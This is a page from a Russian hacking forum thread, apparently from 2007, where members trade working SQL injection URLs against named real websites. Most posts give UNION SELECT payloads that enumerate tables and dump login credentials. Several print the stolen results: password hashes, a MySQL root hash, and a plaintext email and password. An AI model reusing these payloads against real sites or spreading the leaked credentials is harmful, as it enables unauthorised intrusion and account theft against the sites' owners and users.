ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1551  
Старый 02.04.2007, 18:08
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589

Репутация: 337
По умолчанию

Ой, чувствую не поймут меня =)

Цитата:
http://www.dafna.ru/catalog/good/?module=52&id=11110+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,version(),38
 
Ответить с цитированием

  #1552  
Старый 02.04.2007, 18:12
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Код:
http://photo.dive.kz/photo.php?id=-784+union+select+1,2,3,concat(database(),0x3a,user(),0x3a,version()),5,6/*
 
Ответить с цитированием

  #1553  
Старый 02.04.2007, 18:42
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Какой то векторлинукс, в первый раз слышу. http://vectorlinux.com/ Ну да пох=\

Скуль:
Цитата:
http://vectorlinux.com/article.php?sid=40'
Колумны:
Цитата:
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,4,5,6,7,8
Версия 4.1.20:
Цитата:
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,VERSION(),5,6,7,8
Т.к. мускул ниже 5 ветки, то тупо перебераем таблицы.
Цитата:
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,4,5,6,7,8+from+users
Что бы небыло ебли с именами колонок, смотрим форму авторизации:
Код HTML:
	Nickname: <input type="text" name="uname" size="12" maxlength="25" /><br />

	Password: <input type="password" name="pass" size="12" maxlength="20" /><br />
Ибо:
Цитата:
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,concat(uname,0x3a,pass),5,6, 7,8+from+users
Tigger:dd0ced770c9b3a5209a1c48dba1c6d86

Всё=\
__________________
..
 
Ответить с цитированием

  #1554  
Старый 02.04.2007, 18:47
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.antikvar.su/index.php?http_id_part=77&http_id_prod=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
http://www.antikvar.su/index.php?http_id_part=77&http_id_prod=-1+union+select+1,concat(client,char(58),phone),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+request+limit+0,1/*
Код:
http://www.baltex.ru/rus/news/region/yug/?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8/*
http://www.baltex.ru/rus/news/region/yug/?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+information_schema.tables+limit+38,1/*
Код:
http://kvadroplast.perm.ru/catalog.html?cat=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8/*
Кстати я тоже имена колонок смотрю в исходниках формы - почти всегда прокатывает, и ни какие информатион_счема не нужны, хотя с ними тоже не плохо))
 
Ответить с цитированием

  #1555  
Старый 02.04.2007, 18:48
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Add:
Хотя если поиграть с лимитами, выдаёт другого юзера:
Цитата:
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,concat(uname,0x3a,pass),5,6, 7,8+from+users+limit+1,1
__________________
..
 
Ответить с цитированием

  #1556  
Старый 02.04.2007, 18:58
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
Колонка CHARACTER_SET_NAME
Таблица CHARACTER_SETS
Так что только:
ЛОЛ =D
а лимит уже не рулит что ли?
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11+fr om+INFORMATION_SCHEMA.TABLES+limit+1,1/*
 
Ответить с цитированием

  #1557  
Старый 02.04.2007, 19:03
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Цитата:
Сообщение от Spyder  
ЛОЛ =D
а лимит уже не рулит что ли?
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11+fr om+INFORMATION_SCHEMA.TABLES+limit+1,1/*
И это чем то помогло? =\
__________________
..
 
Ответить с цитированием

  #1558  
Старый 02.04.2007, 19:20
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

омфг, Слип. Иди статью Зако почитай =\
 
Ответить с цитированием

  #1559  
Старый 02.04.2007, 19:27
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Поздравьте меня! Мой первый скуль :
Цитата:
http://www.russianst.com/mobile/phone.php?p=1'
Поле там вроди одно
Цитата:
http://www.russianst.com/mobile/phone.php?p=-1+union+select+1
 
Ответить с цитированием

  #1560  
Старый 02.04.2007, 19:27
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Цитата:
Сообщение от [sL1p]  
И это чем то помогло? =\
меня глючит или пароль не выведен? колонка 'passw'
Код:
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,concat(login,0x3a,passw),4,5,6,7,8,9,10,11+from+users/*
admin:a98948bf0421ef30e4e19c0b4844600d


ну и от меня еще:
restko.ru
Код:
http://www.restko.ru/index.php?level=99&info=-99+union+select+convert(concat(user,0x3a,password)+using+cp1251)+from+mysql.user/*
root_s194u:*FB96B86F2CB3B44E1F1854B65E4333A1649F18 6B
к мускул..
Код:
http://www.restko.ru/index.php?level=99&info=-99+union+select+convert(concat(email,0x3a,pass)+using+cp1251)+from+user/*
пароли в чистом виде.. пример - restko@restko.ru:rel021


//upd:
Цитата:
Сообщение от NOmeR1  
Поздравьте меня! Мой первый скуль :

Поле там вроди одно

а вроде нет.. двадцать два
Код:
http://www.russianst.com/mobile/phone.php?p=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
дальше сам думай)

Последний раз редактировалось n1†R0x; 02.04.2007 в 19:34..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ